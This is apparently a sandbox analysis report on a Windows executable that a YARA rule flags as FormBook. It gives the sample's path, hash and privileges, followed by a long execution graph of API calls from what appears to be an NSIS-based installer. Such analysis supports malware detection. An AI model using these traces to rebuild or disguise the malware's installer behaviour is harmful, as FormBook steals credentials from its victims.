                                                                        Commandline:"C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:22.5%
                                                                          Dynamic/Decrypted Code Coverage:14.3%
                                                                          Signature Coverage:21.5%
                                                                          Total number of Nodes:1472
                                                                          Total number of Limit Nodes:46
                                                                          execution_graph 4730 10001000 4733 1000101b 4730->4733 4740 100014bb 4733->4740 4735 10001020 4736 10001024 4735->4736 4737 10001027 GlobalAlloc 4735->4737 4738 100014e2 3 API calls 4736->4738 4737->4736 4739 10001019 4738->4739 4742 100014c1 4740->4742 4741 100014c7 4741->4735 4742->4741 4743 100014d3 GlobalFree 4742->4743 4743->4735 4744 402241 4745 402ace 18 API calls 4744->4745 4746 402247 4745->4746 4747 402ace 18 API calls 4746->4747 4748 402250 4747->4748 4749 402ace 18 API calls 4748->4749 4750 402259 4749->4750 4751 4060c7 2 API calls 4750->4751 4752 402262 4751->4752 4753 402273 lstrlenA lstrlenA 4752->4753 4757 402266 4752->4757 4755 404fdc 25 API calls 4753->4755 4754 404fdc 25 API calls 4758 40226e 4754->4758 4756 4022af SHFileOperationA 4755->4756 4756->4757 4756->4758 4757->4754 4759 4022c3 4760 4022ca 4759->4760 4762 4022dd 4759->4762 4761 405de5 18 API calls 4760->4761 4763 4022d7 4761->4763 4764 4055b9 MessageBoxIndirectA 4763->4764 4764->4762 4162 401746 4163 402ace 18 API calls 4162->4163 4164 40174d 4163->4164 4165 405a65 2 API calls 4164->4165 4166 401754 4165->4166 4167 405a65 2 API calls 4166->4167 4167->4166 4765 4026c7 4766 4026cd 4765->4766 4767 4026d5 FindClose 4766->4767 4768 40295e 4766->4768 4767->4768 4769 401947 4770 402ace 18 API calls 4769->4770 4771 40194e lstrlenA 4770->4771 4772 40258a 4771->4772 4773 402749 4774 402ace 18 API calls 4773->4774 4775 402757 4774->4775 4776 40276d 4775->4776 4778 402ace 18 API calls 4775->4778 4777 405a11 2 API calls 4776->4777 4779 402773 4777->4779 4778->4776 4801 405a36 GetFileAttributesA CreateFileA 4779->4801 4781 402780 4782 402823 4781->4782 4783 40278c GlobalAlloc 4781->4783 4786 40282b DeleteFileA 4782->4786 4787 40283e 4782->4787 4784 4027a5 4783->4784 4785 40281a CloseHandle 4783->4785 4802 40315b SetFilePointer 4784->4802 4785->4782 4786->4787 4789 4027ab 4790 403145 ReadFile 4789->4790 4791 4027b4 GlobalAlloc 4790->4791 4792 4027c4 4791->4792 4793 4027f8 4791->4793 4795 402f33 32 API calls 4792->4795 4794 405add WriteFile 4793->4794 4796 402804 GlobalFree 4794->4796 4798 4027d1 4795->4798 4797 402f33 32 API calls 4796->4797 4800 402817 4797->4800 4799 4027ef GlobalFree 4798->4799 4799->4793 4800->4785 4801->4781 4802->4789 4185 1000270b 4186 1000275b 4185->4186 4187 1000271b VirtualProtect 4185->4187 4187->4186 4806 1000180d 4807 10001830 4806->4807 4808 10001860 GlobalFree 4807->4808 4809 10001872 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4807->4809 4808->4809 4810 10001266 2 API calls 4809->4810 4811 100019e3 GlobalFree GlobalFree 4810->4811 4812 4020cd 4813 402ace 18 API calls 4812->4813 4814 4020d4 4813->4814 4815 402ace 18 API calls 4814->4815 4816 4020de 4815->4816 4817 402ace 18 API calls 4816->4817 4818 4020e8 4817->4818 4819 402ace 18 API calls 4818->4819 4820 4020f2 4819->4820 4821 402ace 18 API calls 4820->4821 4822 4020fc 4821->4822 4823 40213b CoCreateInstance 4822->4823 4824 402ace 18 API calls 4822->4824 4825 402202 4823->4825 4828 40215a 4823->4828 4824->4823 4826 401423 25 API calls 4825->4826 4827 402238 4825->4827 4826->4827 4828->4825 4829 4021e2 MultiByteToWideChar 4828->4829 4829->4825 4198 404f50 4199 404f60 4198->4199 4200 404f74 4198->4200 4201 404f66 4199->4201 4202 404fbd 4199->4202 4203 404f7c IsWindowVisible 4200->4203 4209 404f9c 4200->4209 4205 403ff4 SendMessageA 4201->4205 4204 404fc2 CallWindowProcA 4202->4204 4203->4202 4206 404f89 4203->4206 4207 404f70 4204->4207 4205->4207 4212 4048a7 SendMessageA 4206->4212 4209->4204 4217 404927 4209->4217 4213 404906 SendMessageA 4212->4213 4214 4048ca GetMessagePos ScreenToClient SendMessageA 4212->4214 4216 4048fe 4213->4216 4215 404903 4214->4215 4214->4216 4215->4213 4216->4209 4226 405dc3 lstrcpynA 4217->4226 4219 40493a 4227 405d21 wsprintfA 4219->4227 4221 404944 4222 40140b 2 API calls 4221->4222 4223 40494d 4222->4223 4228 405dc3 lstrcpynA 4223->4228 4225 404954 4225->4202 4226->4219 4227->4221 4228->4225 4830 4028d2 4831 402aac 18 API calls 4830->4831 4832 4028d8 4831->4832 4833 40290d 4832->4833 4834 402729 4832->4834 4836 4028ea 4832->4836 4833->4834 4835 405de5 18 API calls 4833->4835 4835->4834 4836->4834 4838 405d21 wsprintfA 4836->4838 4838->4834 4245 4023d3 4246 4023d9 4245->4246 4247 402ace 18 API calls 4246->4247 4248 4023eb 4247->4248 4249 402ace 18 API calls 4248->4249 4250 4023f5 RegCreateKeyExA 4249->4250 4251 402729 4250->4251 4252 40241f 4250->4252 4253 402437 4252->4253 4255 402ace 18 API calls 4252->4255 4254 402443 4253->4254 4256 402aac 18 API calls 4253->4256 4257 402462 RegSetValueExA 4254->4257 4259 402f33 32 API calls 4254->4259 4258 402430 lstrlenA 4255->4258 4256->4254 4260 402478 RegCloseKey 4257->4260 4258->4253 4259->4257 4260->4251 4839 401cd4 4840 402aac 18 API calls 4839->4840 4841 401cda IsWindow 4840->4841 4842 401a0e 4841->4842 4262 403ad5 4263 403c28 4262->4263 4264 403aed 4262->4264 4266 403c79 4263->4266 4267 403c39 GetDlgItem GetDlgItem 4263->4267 4264->4263 4265 403af9 4264->4265 4269 403b04 SetWindowPos 4265->4269 4270 403b17 4265->4270 4268 403cd3 4266->4268 4279 401389 2 API calls 4266->4279 4271 403fa8 19 API calls 4267->4271 4272 403ff4 SendMessageA 4268->4272 4295 403c23 4268->4295 4269->4270 4273 403b34 4270->4273 4274 403b1c ShowWindow 4270->4274 4275 403c63 SetClassLongA 4271->4275 4306 403ce5 4272->4306 4276 403b56 4273->4276 4277 403b3c DestroyWindow 4273->4277 4274->4273 4278 40140b 2 API calls 4275->4278 4281 403b5b SetWindowLongA 4276->4281 4282 403b6c 4276->4282 4280 403f52 4277->4280 4278->4266 4283 403cab 4279->4283 4292 403f62 ShowWindow 4280->4292 4280->4295 4281->4295 4284 403c15 4282->4284 4285 403b78 GetDlgItem 4282->4285 4283->4268 4286 403caf SendMessageA 4283->4286 4342 40400f 4284->4342 4289 403ba8 4285->4289 4290 403b8b SendMessageA IsWindowEnabled 4285->4290 4286->4295 4287 40140b 2 API calls 4287->4306 4288 403f33 DestroyWindow EndDialog 4288->4280 4294 403bad 4289->4294 4296 403bb5 4289->4296 4298 403bfc SendMessageA 4289->4298 4299 403bc8 4289->4299 4290->4289 4290->4295 4292->4295 4293 405de5 18 API calls 4293->4306 4339 403f81 4294->4339 4296->4294 4296->4298 4298->4284 4301 403bd0 4299->4301 4302 403be5 4299->4302 4300 403be3 4300->4284 4305 40140b 2 API calls 4301->4305 4304 40140b 2 API calls 4302->4304 4303 403fa8 19 API calls 4303->4306 4307 403bec 4304->4307 4305->4294 4306->4287 4306->4288 4306->4293 4306->4295 4306->4303 4323 403e73 DestroyWindow 4306->4323 4333 403fa8 4306->4333 4307->4284 4307->4294 4309 403d60 GetDlgItem 4310 403d75 4309->4310 4311 403d7d ShowWindow KiUserCallbackDispatcher 4309->4311 4310->4311 4336 403fca EnableWindow 4311->4336 4313 403da7 EnableWindow 4316 403dbb 4313->4316 4314 403dc0 GetSystemMenu EnableMenuItem SendMessageA 4315 403df0 SendMessageA 4314->4315 4314->4316 4315->4316 4316->4314 4337 403fdd SendMessageA 4316->4337 4338 405dc3 lstrcpynA 4316->4338 4319 403e1e lstrlenA 4320 405de5 18 API calls 4319->4320 4321 403e2f SetWindowTextA 4320->4321 4322 401389 2 API calls 4321->4322 4322->4306 4323->4280 4324 403e8d CreateDialogParamA 4323->4324 4324->4280 4325 403ec0 4324->4325 4326 403fa8 19 API calls 4325->4326 4327 403ecb GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4326->4327 4328 401389 2 API calls 4327->4328 4329 403f11 4328->4329 4329->4295 4330 403f19 ShowWindow 4329->4330 4331 403ff4 SendMessageA 4330->4331 4332 403f31 4331->4332 4332->4280 4334 405de5 18 API calls 4333->4334 4335 403fb3 SetDlgItemTextA 4334->4335 4335->4309 4336->4313 4337->4316 4338->4319 4340 403f88 4339->4340 4341 403f8e SendMessageA 4339->4341 4340->4341 4341->4300 4343 4040b0 4342->4343 4344 404027 GetWindowLongA 4342->4344 4343->4295 4344->4343 4345 404038 4344->4345 4346 404047 GetSysColor 4345->4346 4347 40404a 4345->4347 4346->4347 4348 404050 SetTextColor 4347->4348 4349 40405a SetBkMode 4347->4349 4348->4349 4350 404072 GetSysColor 4349->4350 4351 404078 4349->4351 4350->4351 4352 404089 4351->4352 4353 40407f SetBkColor 4351->4353 4352->4343 4354 4040a3 CreateBrushIndirect 4352->4354 4355 40409c DeleteObject 4352->4355 4353->4352 4354->4343 4355->4354 4843 4014d6 4844 402aac 18 API calls 4843->4844 4845 4014dc Sleep 4844->4845 4847 40295e 4845->4847 4375 4025d7 4376 402aac 18 API calls 4375->4376 4381 4025e1 4376->4381 4377 40264f 4378 405aae ReadFile 4378->4381 4379 402651 4384 405d21 wsprintfA 4379->4384 4380 402661 4380->4377 4383 402677 SetFilePointer 4380->4383 4381->4377 4381->4378 4381->4379 4381->4380 4383->4377 4384->4377 4408 404959 GetDlgItem GetDlgItem 4409 4049ab 7 API calls 4408->4409 4416 404bc3 4408->4416 4410 404a41 SendMessageA 4409->4410 4411 404a4e DeleteObject 4409->4411 4410->4411 4412 404a57 4411->4412 4414 404a8e 4412->4414 4415 405de5 18 API calls 4412->4415 4413 404ca7 4419 404d53 4413->4419 4425 404f3b 4413->4425 4430 404d00 SendMessageA 4413->4430 4418 403fa8 19 API calls 4414->4418 4420 404a70 SendMessageA SendMessageA 4415->4420 4416->4413 4417 404c88 4416->4417 4423 404c23 4416->4423 4417->4413 4427 404c99 SendMessageA 4417->4427 4424 404aa2 4418->4424 4421 404d65 4419->4421 4422 404d5d SendMessageA 4419->4422 4420->4412 4432 404d77 ImageList_Destroy 4421->4432 4433 404d7e 4421->4433 4449 404d8e 4421->4449 4422->4421 4428 4048a7 5 API calls 4423->4428 4429 403fa8 19 API calls 4424->4429 4426 40400f 8 API calls 4425->4426 4431 404f49 4426->4431 4427->4413 4454 404c34 4428->4454 4434 404ab0 4429->4434 4430->4425 4436 404d15 SendMessageA 4430->4436 4432->4433 4437 404d87 GlobalFree 4433->4437 4433->4449 4438 404b84 GetWindowLongA SetWindowLongA 4434->4438 4445 404b7e 4434->4445 4448 404aff SendMessageA 4434->4448 4450 404b3b SendMessageA 4434->4450 4451 404b4c SendMessageA 4434->4451 4435 404efd 4435->4425 4440 404f0f ShowWindow GetDlgItem ShowWindow 4435->4440 4439 404d28 4436->4439 4437->4449 4441 404b9d 4438->4441 4444 404d39 SendMessageA 4439->4444 4440->4425 4442 404ba3 ShowWindow 4441->4442 4443 404bbb 4441->4443 4463 403fdd SendMessageA 4442->4463 4464 403fdd SendMessageA 4443->4464 4444->4419 4445->4438 4445->4441 4448->4434 4449->4435 4452 404927 4 API calls 4449->4452 4459 404dc9 4449->4459 4450->4434 4451->4434 4452->4459 4453 404bb6 4453->4425 4454->4417 4455 404ed3 InvalidateRect 4455->4435 4456 404ee9 4455->4456 4465 404862 4456->4465 4457 404df7 SendMessageA 4458 404e0d 4457->4458 4458->4455 4460 404e6e 4458->4460 4462 404e81 SendMessageA SendMessageA 4458->4462 4459->4457 4459->4458 4460->4462 4462->4458 4463->4453 4464->4416 4468 40479d 4465->4468 4467 404877 4467->4435 4469 4047b3 4468->4469 4470 405de5 18 API calls 4469->4470 4471 404817 4470->4471 4472 405de5 18 API calls 4471->4472 4473 404822 4472->4473 4474 405de5 18 API calls 4473->4474 4475 404838 lstrlenA wsprintfA SetDlgItemTextA 4474->4475 4475->4467 4476 401759 4477 402ace 18 API calls 4476->4477 4478 401760 4477->4478 4479 401786 4478->4479 4480 40177e 4478->4480 4517 405dc3 lstrcpynA 4479->4517 4516 405dc3 lstrcpynA 4480->4516 4483 401784 4487 40602e 5 API calls 4483->4487 4484 401791 4485 405835 3 API calls 4484->4485 4486 401797 lstrcatA 4485->4486 4486->4483 4509 4017a3 4487->4509 4488 4060c7 2 API calls 4488->4509 4489 4017e4 4490 405a11 2 API calls 4489->4490 4490->4509 4492 4017ba CompareFileTime 4492->4509 4493 40187e 4495 404fdc 25 API calls 4493->4495 4494 401855 4496 404fdc 25 API calls 4494->4496 4503 40186a 4494->4503 4497 401888 4495->4497 4496->4503 4498 402f33 32 API calls 4497->4498 4499 40189b 4498->4499 4500 4018af SetFileTime 4499->4500 4502 4018c1 CloseHandle 4499->4502 4500->4502 4501 405de5 18 API calls 4501->4509 4502->4503 4504 4018d2 4502->4504 4506 4018d7 4504->4506 4507 4018ea 4504->4507 4505 405dc3 lstrcpynA 4505->4509 4510 405de5 18 API calls 4506->4510 4508 405de5 18 API calls 4507->4508 4511 4018f2 4508->4511 4509->4488 4509->4489 4509->4492 4509->4493 4509->4494 4509->4501 4509->4505 4512 4055b9 MessageBoxIndirectA 4509->4512 4515 405a36 GetFileAttributesA CreateFileA 4509->4515 4513 4018df lstrcatA 4510->4513 4514 4055b9 MessageBoxIndirectA 4511->4514 4512->4509 4513->4511 4514->4503 4515->4509 4516->4483 4517->4484 4848 401659 4849 402ace 18 API calls 4848->4849 4850 40165f 4849->4850 4851 4060c7 2 API calls 4850->4851 4852 401665 4851->4852 4853 401e59 4854 402ace 18 API calls 4853->4854 4855 401e5f 4854->4855 4856 402ace 18 API calls 4855->4856 4857 401e68 4856->4857 4858 402ace 18 API calls 4857->4858 4859 401e71 4858->4859 4860 402ace 18 API calls 4859->4860 4861 401e7a 4860->4861 4862 401423 25 API calls 4861->4862 4863 401e81 ShellExecuteA 4862->4863 4864 401eae 4863->4864 4865 401959 4866 402aac 18 API calls 4865->4866 4867 401960 4866->4867 4868 402aac 18 API calls 4867->4868 4869 40196d 4868->4869 4870 402ace 18 API calls 4869->4870 4871 401984 lstrlenA 4870->4871 4872 401994 4871->4872 4873 4019d4 4872->4873 4877 405dc3 lstrcpynA 4872->4877 4875 4019c4 4875->4873 4876 4019c9 lstrlenA 4875->4876 4876->4873 4877->4875 4878 1000161a 4879 10001649 4878->4879 4880 10001a5d 18 API calls 4879->4880 4881 10001650 4880->4881 4882 10001663 4881->4882 4883 10001657 4881->4883 4885 1000168a 4882->4885 4886 1000166d 4882->4886 4884 10001266 2 API calls 4883->4884 4889 10001661 4884->4889 4887 10001690 4885->4887 4888 100016b4 4885->4888 4890 100014e2 3 API calls 4886->4890 4891 10001559 3 API calls 4887->4891 4892 100014e2 3 API calls 4888->4892 4893 10001672 4890->4893 4894 10001695 4891->4894 4892->4889 4895 10001559 3 API calls 4893->4895 4896 10001266 2 API calls 4894->4896 4897 10001678 4895->4897 4899 1000169b GlobalFree 4896->4899 4898 10001266 2 API calls 4897->4898 4900 1000167e GlobalFree 4898->4900 4899->4889 4901 100016af GlobalFree 4899->4901 4900->4889 4901->4889 4902 401b5d 4903 401bae 4902->4903 4907 401b6a 4902->4907 4904 401bd7 GlobalAlloc 4903->4904 4905 401bb2 4903->4905 4906 405de5 18 API calls 4904->4906 4916 4022dd 4905->4916 4923 405dc3 lstrcpynA 4905->4923 4910 401bf2 4906->4910 4907->4910 4911 401b81 4907->4911 4908 405de5 18 API calls 4912 4022d7 4908->4912 4910->4908 4910->4916 4921 405dc3 lstrcpynA 4911->4921 4915 4055b9 MessageBoxIndirectA 4912->4915 4913 401bc4 GlobalFree 4913->4916 4915->4916 4917 401b90 4922 405dc3 lstrcpynA 4917->4922 4919 401b9f 4924 405dc3 lstrcpynA 4919->4924 4921->4917 4922->4919 4923->4913 4924->4916 4925 401f5d 4926 402ace 18 API calls 4925->4926 4927 401f64 4926->4927 4928 40615c 5 API calls 4927->4928 4929 401f73 4928->4929 4930 401f8b GlobalAlloc 4929->4930 4939 401ff3 4929->4939 4931 401f9f 4930->4931 4930->4939 4932 40615c 5 API calls 4931->4932 4933 401fa6 4932->4933 4934 40615c 5 API calls 4933->4934 4935 401fb0 4934->4935 4935->4939 4940 405d21 wsprintfA 4935->4940 4937 401fe7 4941 405d21 wsprintfA 4937->4941 4940->4937 4941->4939 4942 401a5e 4943 402aac 18 API calls 4942->4943 4944 401a64 4943->4944 4945 402aac 18 API calls 4944->4945 4946 401a0e 4945->4946 4947 4026e1 4948 4026e7 4947->4948 4949 4026eb FindNextFileA 4948->4949 4951 4026fd 4948->4951 4950 40273c 4949->4950 4949->4951 4953 405dc3 lstrcpynA 4950->4953 4953->4951 4954 4043e6 4955 404412 4954->4955 4956 404423 4954->4956 5015 40559d GetDlgItemTextA 4955->5015 4958 40442f GetDlgItem 4956->4958 4965 40448e 4956->4965 4961 404443 4958->4961 4959 404572 4964 40471c 4959->4964 5017 40559d GetDlgItemTextA 4959->5017 4960 40441d 4962 40602e 5 API calls 4960->4962 4963 404457 SetWindowTextA 4961->4963 4967 4058ce 4 API calls 4961->4967 4962->4956 4968 403fa8 19 API calls 4963->4968 4971 40400f 8 API calls 4964->4971 4965->4959 4965->4964 4969 405de5 18 API calls 4965->4969 4973 40444d 4967->4973 4974 404473 4968->4974 4975 404502 SHBrowseForFolderA 4969->4975 4970 4045a2 4976 405923 18 API calls 4970->4976 4972 404730 4971->4972 4973->4963 4980 405835 3 API calls 4973->4980 4977 403fa8 19 API calls 4974->4977 4975->4959 4978 40451a CoTaskMemFree 4975->4978 4979 4045a8 4976->4979 4981 404481 4977->4981 4982 405835 3 API calls 4978->4982 5018 405dc3 lstrcpynA 4979->5018 4980->4963 5016 403fdd SendMessageA 4981->5016 4984 404527 4982->4984 4987 40455e SetDlgItemTextA 4984->4987 4991 405de5 18 API calls 4984->4991 4986 404487 4989 40615c 5 API calls 4986->4989 4987->4959 4988 4045bf 4990 40615c 5 API calls 4988->4990 4989->4965 4997 4045c6 4990->4997 4992 404546 lstrcmpiA 4991->4992 4992->4987 4995 404557 lstrcatA 4992->4995 4993 404602 5019 405dc3 lstrcpynA 4993->5019 4995->4987 4996 404609 4998 4058ce 4 API calls 4996->4998 4997->4993 5001 40587c 2 API calls 4997->5001 5003 40465a 4997->5003 4999 40460f GetDiskFreeSpaceA 4998->4999 5002 404633 MulDiv 4999->5002 4999->5003 5001->4997 5002->5003 5004 4046cb 5003->5004 5006 404862 21 API calls 5003->5006 5005 4046ee 5004->5005 5007 40140b 2 API calls 5004->5007 5020 403fca EnableWindow 5005->5020 5008 4046b8 5006->5008 5007->5005 5010 4046cd SetDlgItemTextA 5008->5010 5011 4046bd 5008->5011 5010->5004 5013 40479d 21 API calls 5011->5013 5012 40470a 5012->4964 5021 40437b 5012->5021 5013->5004 5015->4960 5016->4986 5017->4970 5018->4988 5019->4996 5020->5012 5022 404389 5021->5022 5023 40438e SendMessageA 5021->5023 5022->5023 5023->4964 4168 40166a 4169 402ace 18 API calls 4168->4169 4170 401671 4169->4170 4171 402ace 18 API calls 4170->4171 4172 40167a 4171->4172 4173 402ace 18 API calls 4172->4173 4174 401683 MoveFileA 4173->4174 4175 401696 4174->4175 4181 40168f 4174->4181 4177 4060c7 2 API calls 4175->4177 4179 402238 4175->4179 4178 4016a5 4177->4178 4178->4179 4180 405c7e 38 API calls 4178->4180 4180->4181 4182 401423 4181->4182 4183 404fdc 25 API calls 4182->4183 4184 401431 4183->4184 4184->4179 5024 4019ed 5025 402ace 18 API calls 5024->5025 5026 4019f4 5025->5026 5027 402ace 18 API calls 5026->5027 5028 4019fd 5027->5028 5029 401a04 lstrcmpiA 5028->5029 5030 401a16 lstrcmpA 5028->5030 5031 401a0a 5029->5031 5030->5031 5032 40256e 5033 402ace 18 API calls 5032->5033 5034 402575 5033->5034 5037 405a36 GetFileAttributesA CreateFileA 5034->5037 5036 402581 5037->5036 5038 4040f1 5039 404107 5038->5039 5043 404213 5038->5043 5041 403fa8 19 API calls 5039->5041 5040 404282 5042 40428c GetDlgItem 5040->5042 5044 404356 5040->5044 5045 40415d 5041->5045 5046 4042a2 5042->5046 5047 404314 5042->5047 5043->5040 5043->5044 5048 404257 GetDlgItem SendMessageA 5043->5048 5049 40400f 8 API calls 5044->5049 5050 403fa8 19 API calls 5045->5050 5046->5047 5055 4042c8 6 API calls 5046->5055 5047->5044 5051 404326 5047->5051 5069 403fca EnableWindow 5048->5069 5053 404351 5049->5053 5054 40416a CheckDlgButton 5050->5054 5056 40432c SendMessageA 5051->5056 5057 40433d 5051->5057 5067 403fca EnableWindow 5054->5067 5055->5047 5056->5057 5057->5053 5060 404343 SendMessageA 5057->5060 5058 40427d 5061 40437b SendMessageA 5058->5061 5060->5053 5061->5040 5062 404188 GetDlgItem 5068 403fdd SendMessageA 5062->5068 5064 40419e SendMessageA 5065 4041c5 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5064->5065 5066 4041bc GetSysColor 5064->5066 5065->5053 5066->5065 5067->5062 5068->5064 5069->5058 4229 4022f2 4230 4022fa 4229->4230 4235 402300 4229->4235 4231 402ace 18 API calls 4230->4231 4231->4235 4232 402ace 18 API calls 4234 402310 4232->4234 4233 40231e 4237 402ace 18 API calls 4233->4237 4234->4233 4236 402ace 18 API calls 4234->4236 4235->4232 4235->4234 4236->4233 4238 402327 WritePrivateProfileStringA 4237->4238 5070 100015b3 5071 100014bb GlobalFree 5070->5071 5073 100015cb 5071->5073 5072 10001611 GlobalFree 5073->5072 5074 100015e6 5073->5074 5075 100015fd VirtualFree 5073->5075 5074->5072 5075->5072 5076 4014f4 SetForegroundWindow 5077 40295e 5076->5077 4356 4024f5 4357 402bd8 19 API calls 4356->4357 4358 4024ff 4357->4358 4359 402aac 18 API calls 4358->4359 4360 402508 4359->4360 4361 402523 RegEnumKeyA 4360->4361 4362 40252f RegEnumValueA 4360->4362 4364 402729 4360->4364 4363 402548 RegCloseKey 4361->4363 4362->4363 4362->4364 4363->4364 5078 401cf5 5079 402aac 18 API calls 5078->5079 5080 401cfc 5079->5080 5081 402aac 18 API calls 5080->5081 5082 401d08 GetDlgItem 5081->5082 5083 40258a 5082->5083 4385 402377 4386 4023a7 4385->4386 4387 40237c 4385->4387 4389 402ace 18 API calls 4386->4389 4388 402bd8 19 API calls 4387->4388 4390 402383 4388->4390 4391 4023ae 4389->4391 4392 40238d 4390->4392 4396 4023c4 4390->4396 4397 402b0e RegOpenKeyExA 4391->4397 4393 402ace 18 API calls 4392->4393 4395 402394 RegDeleteValueA RegCloseKey 4393->4395 4395->4396 4398 402ba2 4397->4398 4406 402b39 4397->4406 4398->4396 4399 402b5f RegEnumKeyA 4400 402b71 RegCloseKey 4399->4400 4399->4406 4401 40615c 5 API calls 4400->4401 4404 402b81 4401->4404 4402 402b96 RegCloseKey 4405 402b85 4402->4405 4403 402b0e 5 API calls 4403->4406 4404->4405 4407 402bb1 RegDeleteKeyA 4404->4407 4405->4398 4406->4399 4406->4400 4406->4402 4406->4403 4407->4405 5084 1000103d 5085 1000101b 5 API calls 5084->5085 5086 10001056 5085->5086 5087 4018fd 5088 401934 5087->5088 5089 402ace 18 API calls 5088->5089 5090 401939 5089->5090 5091 405665 69 API calls 5090->5091 5092 401942 5091->5092 4548 401fff 4549 402011 4548->4549 4550 4020bf 4548->4550 4551 402ace 18 API calls 4549->4551 4552 401423 25 API calls 4550->4552 4553 402018 4551->4553 4558 402238 4552->4558 4554 402ace 18 API calls 4553->4554 4555 402021 4554->4555 4556 402036 LoadLibraryExA 4555->4556 4557 402029 GetModuleHandleA 4555->4557 4556->4550 4559 402046 GetProcAddress 4556->4559 4557->4556 4557->4559 4560 402092 4559->4560 4561 402055 4559->4561 4564 404fdc 25 API calls 4560->4564 4562 402074 4561->4562 4563 40205d 4561->4563 4569 100016bd 4562->4569 4565 401423 25 API calls 4563->4565 4566 402065 4564->4566 4565->4566 4566->4558 4567 4020b3 FreeLibrary 4566->4567 4567->4558 4570 100016ed 4569->4570 4611 10001a5d 4570->4611 4572 100016f4 4573 1000180a 4572->4573 4574 10001705 4572->4574 4575 1000170c 4572->4575 4573->4566 4660 100021b0 4574->4660 4643 100021fa 4575->4643 4580 10001770 4586 100017b2 4580->4586 4587 10001776 4580->4587 4581 10001752 4673 100023da 4581->4673 4582 10001722 4585 10001728 4582->4585 4591 10001733 4582->4591 4583 1000173b 4596 10001731 4583->4596 4670 10002aa3 4583->4670 4585->4596 4654 100027e8 4585->4654 4589 100023da 11 API calls 4586->4589 4593 10001559 3 API calls 4587->4593 4594 100017a4 4589->4594 4590 10001758 4684 10001559 4590->4684 4664 10002589 4591->4664 4598 1000178c 4593->4598 4610 100017f9 4594->4610 4695 100023a0 4594->4695 4596->4580 4596->4581 4601 100023da 11 API calls 4598->4601 4600 10001739 4600->4596 4601->4594 4603 10001803 GlobalFree 4603->4573 4607 100017e5 4607->4610 4699 100014e2 wsprintfA 4607->4699 4608 100017de FreeLibrary 4608->4607 4610->4573 4610->4603 4702 10001215 GlobalAlloc 4611->4702 4613 10001a81 4703 10001215 GlobalAlloc 4613->4703 4615 10001cbb GlobalFree GlobalFree GlobalFree 4616 10001cd8 4615->4616 4632 10001d22 4615->4632 4617 1000201a 4616->4617 4625 10001ced 4616->4625 4616->4632 4619 1000203c GetModuleHandleA 4617->4619 4617->4632 4618 10001b60 GlobalAlloc 4640 10001a8c 4618->4640 4620 10002062 4619->4620 4621 1000204d LoadLibraryA 4619->4621 4710 100015a4 GetProcAddress 4620->4710 4621->4620 4621->4632 4622 10001bab lstrcpyA 4626 10001bb5 lstrcpyA 4622->4626 4623 10001bc9 GlobalFree 4623->4640 4625->4632 4706 10001224 4625->4706 4626->4640 4627 100020b3 4628 100020c0 lstrlenA 4627->4628 4627->4632 4711 100015a4 GetProcAddress 4628->4711 4630 10001f7a 4631 10001fbe lstrcpyA 4630->4631 4630->4632 4631->4632 4632->4572 4633 10002074 4633->4627 4642 1000209d GetProcAddress 4633->4642 4636 10001c07 4636->4640 4704 10001534 GlobalSize GlobalAlloc 4636->4704 4637 10001e75 GlobalFree 4637->4640 4638 100020d9 4638->4632 4640->4615 4640->4618 4640->4622 4640->4623 4640->4626 4640->4630 4640->4632 4640->4636 4640->4637 4641 10001224 2 API calls 4640->4641 4709 10001215 GlobalAlloc 4640->4709 4641->4640 4642->4627 4645 10002212 4643->4645 4644 10001224 GlobalAlloc lstrcpynA 4644->4645 4645->4644 4647 10002349 GlobalFree 4645->4647 4648 100022b9 GlobalAlloc MultiByteToWideChar 4645->4648 4649 1000230a lstrlenA 4645->4649 4713 100012ad 4645->4713 4647->4645 4650 10001712 4647->4650 4651 10002303 4648->4651 4652 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4648->4652 4649->4647 4649->4651 4650->4582 4650->4583 4650->4596 4651->4647 4717 1000251d 4651->4717 4652->4647 4656 100027fa 4654->4656 4655 1000289f SetFilePointer 4657 100028bd 4655->4657 4656->4655 4658 100029b9 4657->4658 4659 100029ae GetLastError 4657->4659 4658->4596 4659->4658 4661 100021c0 4660->4661 4663 1000170b 4660->4663 4662 100021d2 GlobalAlloc 4661->4662 4661->4663 4662->4661 4663->4575 4668 100025a5 4664->4668 4665 100025f6 GlobalAlloc 4669 10002618 4665->4669 4666 10002609 4667 1000260e GlobalSize 4666->4667 4666->4669 4667->4669 4668->4665 4668->4666 4669->4600 4671 10002aae 4670->4671 4672 10002aee GlobalFree 4671->4672 4720 10001215 GlobalAlloc 4673->4720 4675 100023e6 4676 1000243a lstrcpynA 4675->4676 4677 1000244b StringFromGUID2 WideCharToMultiByte 4675->4677 4678 1000246f WideCharToMultiByte 4675->4678 4679 10002490 wsprintfA 4675->4679 4680 100024b4 GlobalFree 4675->4680 4681 100024ee GlobalFree 4675->4681 4682 10001266 2 API calls 4675->4682 4721 100012d1 4675->4721 4676->4675 4677->4675 4678->4675 4679->4675 4680->4675 4681->4590 4682->4675 4725 10001215 GlobalAlloc 4684->4725 4686 1000155f 4688 10001586 4686->4688 4689 1000156c lstrcpyA 4686->4689 4690 100015a0 4688->4690 4691 1000158b wsprintfA 4688->4691 4689->4690 4692 10001266 4690->4692 4691->4690 4693 100012a8 GlobalFree 4692->4693 4694 1000126f GlobalAlloc lstrcpynA 4692->4694 4693->4594 4694->4693 4696 100023ae 4695->4696 4698 100017c5 4695->4698 4697 100023c7 GlobalFree 4696->4697 4696->4698 4697->4696 4698->4607 4698->4608 4700 10001266 2 API calls 4699->4700 4701 10001503 4700->4701 4701->4610 4702->4613 4703->4640 4705 10001552 4704->4705 4705->4636 4712 10001215 GlobalAlloc 4706->4712 4708 10001233 lstrcpynA 4708->4632 